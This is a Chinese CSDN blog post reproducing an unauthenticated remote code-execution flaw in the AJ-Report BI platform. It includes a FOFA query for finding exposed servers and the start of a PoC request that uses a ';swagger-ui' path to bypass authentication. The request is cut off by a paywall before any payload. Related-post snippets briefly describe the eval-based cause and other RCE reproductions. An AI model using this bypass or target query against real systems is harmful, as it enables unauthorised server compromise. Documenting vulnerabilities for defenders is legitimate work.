AJ-Report开源数据大屏 verification;swagger-ui RCE漏洞复现

已于 2024-05-06 09:20:20 修改
阅读量855 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-03 23:25:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138427499
版权

0x01 产品简介

AJ-Report是一个完全开源的BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu等多种驱动,支持自定义数据集省去数据接口开发,支持17+种大屏组件,不会开发,照着设计稿也可以制作大屏。三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布。欢迎体验。

0x02 漏洞概述

AJ-Report开源数据大屏 verification;swagger-ui接口存在远程命令执行漏洞,未经身份验证的远程攻击者可以利用此类漏洞执行任意命令,写入后门文件,最终可获取服务器权限。

0x03 复现环境

FOFA:title="AJ-Report"

0x04 漏洞复现

PoC

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applic
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
WEB安全:Tomcat-Ajp协议漏洞分析
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
08-23 683
目录 一、漏洞描述 Apache与Tomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、漏洞危害等级 三、影响版本 四、漏洞原理 五、两种利用方式: 1、利用DefaultServlet实现任意文件下载 2、通过jspservlet实现任意后缀文件
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具
12-17
AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,目前已支持30+种大屏组件/图表,不会开发,照着设计稿也可以制作大屏。三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布
awesome-open-hardware-verification:免费和开源硬件验证工具和框架列表
05-06
开放式硬件验证 精选的免费和开源硬件验证工具和框架列表。 此处的目的是整理(主要是)全面的可用工具列表,以验证免费和开源硬件设计的功能正确性。 该列表可以包括: 其中包含或执行验证相关功能 使编写测试平台更加容易 这是自由/开源硬件验证的努力很好的例子 和博客文章,介绍如何实际进行硬件设计验证 讨论开源硬件验证新工作的 鼓励请求请求和提交! 一些规则: 此列表侧重于验证而不是设计。 虽然有很多很酷的新语言和框架旨在简化硬件设计(或者至少不是Verilog / VHDL ),但有时验证可能会被冷落。 虽然一些新的设计工具/语言声称“我们的新设计工具X因为以高级语言Y编写而使验证更加容易”,但从可重复使用的验证IP /框架的角度来看,往往很难找到证据。 /用“新语言/工具Y ”编写的方法。 看起来似乎很卑鄙,但是作为一种新的设计语言,从理论上讲,它使验证变得更加容易,不足以将其列入此
复现CVE-2022-10270(向日葵远程代码执行漏洞
BGiscool的博客
02-22 3428
CVE-2022-10270-向日葵远程代码执行漏洞复现
AJ-Report二次开发环境配置踩坑
Remo_jun的博客
07-04 1096
这里是配置供前后端分离的环境,java小白,本机java的环境几乎是零,这边写一些配置环境遇到的问题。建议先配置后端再配置前端。
Springboot 集成 AJ-Captcha 行为验证码实战 -- 验证码
Santorini_liu的博客
06-24 4439
行为验证码码 滑动验证码 aj-captcha springboot 集成 验证码
AJ-Report代码执行漏洞分析
qq_18193739的博客
05-06 660
verification方法传入参数,调用了eval执行JavaScript 代码,导致的代码执行漏洞。使用;绕过鉴权。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 460
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
可配置大屏--AJ-report使用说明(有问题可私信)
m0_71863467的博客
10-08 917
可配置大屏--AJ-report使用说明
AJ-Report项目源码分析(1)
qq_45835078的博客
09-30 2101
2021SC@SDUSC 项目分工 前端模块如下图,我负责的是前端的用户权限模块和系统设置模块。 启动项目 环境: 前端:node.js vue element-ui 后端:maven,jdk1.8+,springboot 源码地址:https://gitee.com/anji-plus/report 后端:把report-core文件夹导入到idea中,修改eport-core --> src --> main --> resources --> boots..
open-speaker-verification:说话人验证工具
05-29
打开扬声器验证 消息 [11/24/2020] 未来的重要更新将集中在 VoxSRC2020 技术报告上。 还有一个大规模的 ID(1M+ Identities) 训练脚本将在稍后更新。 更多模型基准将更新:) [10/25/2020] 我发布了基于...
Background Verification Services-开源
05-27
一个系统,该系统处理集成服务和注册公司的所有任务,并通过即时验证其先前的工作经验来管理员工的招聘。
AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑.rar
06-30
新增大屏分享功能 大屏图表动态数据集支持数据大屏图表动态数据集字典进行分类管理 文件管理上传问题 文件管理添加复制url功能 优化数据集清洗功能 新增图表:堆叠图 近期计划: 表格存在的问题,进行优化 编辑大屏数据集回显问题 大屏宽高动态适配问题 大屏导入导出功能 整体样式调整、优化 AJ-Report由 安吉加加 开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。 多数据源支持,内置 mysql 、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,支持17种大屏组件,不会开发,照着设计稿也可以制作大屏。 三步轻松完成大屏设计:配置数据源---->写 SQL 配置数据集---->拖拽配置大屏---->保存发布。欢迎体验。 AJ-Report V0.9.2 发布,分享功能它来了
Rockchip-Developer-Guide-DDR-Verification-Process-CN.pdf
04-25
Rockchip-Developer-Guide-DDR-Verification-Process-CN.pdf
Resource Usage Verification-开源
07-17
资源使用验证
漏洞复现-CVE-2023-33246 Apache RocketMQ RCE漏洞原理与复现
关注网络安全、云原生安全
07-15 2899
服务端管理员调用的接口没有鉴权,且将内容直接拼接到执行的命令,没有做过滤。
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 972
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 333
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
提高岩土工程安全的关键:锚索测力计的应用
yousino1的博客
05-10 211
通过实时监控数据,工程师能够及时发现锚索力量的异常变化,并迅速采取补强措施,成功避免了一次可能的边坡滑坡,确保了施工安全和道路使用的安全。在众多技术和工具中,锚索测力计的应用在提高岩土工程的安全性方面发挥了不可替代的作用。- 坡面和边坡稳定:在施工或自然斜坡可能出现滑移的情况下,通过预应力锚索将斜坡加固,并使用锚索测力计监控锚索的实时力量,及时调整预应力,以防止坡面滑移。锚索测力计作为岩土工程中一项重要的监测工具,随着技术的不断进步,其应用将更加广泛,对保障工程结构的稳定性和安全性具有重大意义。
aws-model-based-network-verification/
09-01
AWS模型驱动的网络验证(Model-based Network Verification)是一种在AWS云环境中进行网络验证的方法。它基于模型,通过自动化验证网络配置和行为的正确性,帮助用户减少风险和提高网络可靠性。此方法使用AWS网络配置和流量模型,结合AWS服务的知识,以验证网络实现是否符合用户的预期。 这种网络验证方法主要包括以下步骤: 首先,用户需要构建一个包含网络拓扑结构、连接和安全策略等信息的网络模型。网络模型可以使用AWS提供的云服务(如AWS CloudFormation)或者第三方工具来创建。 接下来,用户需要定义网络验证的标准和规则。这些标准和规则可以基于AWS的文档、最佳实践或用户自定义的要求。例如,可以验证网络配置是否符合安全组规则、子网之间的路由是否正确等。 然后,用户可以使用模型驱动的网络验证工具来验证网络模型和网络配置是否一致。这些工具可以自动分析网络模型,并与实际网络配置进行对比。如果发现不一致或者不符合规则的情况,这些工具会生成报告并提供修复建议。 最后,用户可以根据验证结果进行网络配置的修改和调整。网络模型驱动的验证工具可以帮助用户快速定位和修复网络配置中的问题,从而提高网络的可靠性和安全性。 总之,AWS模型驱动的网络验证是一种通过验证网络模型和实际网络配置的一致性来提高网络可靠性和安全性的方法。通过自动化的验证工具,用户可以快速发现和修复网络配置中的问题,减少风险并提高网络性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值